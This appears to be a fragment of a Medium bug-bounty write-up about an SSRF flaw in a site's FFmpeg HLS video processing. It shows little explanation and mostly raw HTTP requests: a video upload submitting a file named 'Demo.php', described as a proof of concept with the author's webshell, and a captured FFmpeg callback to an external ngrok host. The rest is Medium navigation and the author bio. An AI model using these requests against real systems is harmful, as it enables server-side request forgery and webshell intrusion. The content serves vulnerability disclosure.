SSRF vulnerability via FFmpeg HLS processing

POST /user/video/upload/submit/?ajax=1 HTTP/1.1
Host: www.redacted.com


-----------------------------338208911492032229419126784
Content-Disposition: form-data; name="video"; filename="Demo.php"
POC with my webshell
GET /FFMPEG.avi?.txt HTTP/1.1
User-Agent: Lavf/56.40.101
Accept: */*
Connection: close
Host: 03e***d.ngrok.io
Icy-MetaData: 1
X-Forwarded-For: 18.***.***.66

References

--

--

--

I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How To Bob and Alice and Carol Add Their Encryption Keys To Data?

The making of the XOR cipher

Threat Modeling at Harvard: A Case for Requiring LastPass

Analyzing obfuscated Powershell with shellcode

How Spammers Use Redirection to Obfuscate Malicious URLs

What is SMTP?

{UPDATE} Resort Island Tycoon Hack Free Resources Generator

5 SMART WAYS TO MAINTAIN A SAFE ONLINE PAYMENT

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Valeriy Shevchenko

Valeriy Shevchenko

I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

More from Medium

InSecure Design Vulnerabilities: What are they and Why they Occurs

Paper - HackTheBox [Writeup]

CTF Write-Up: Kryptonite

Protecting Yourself From Deceptive Bug Bounty Programs and Deceptive Scopes/Targets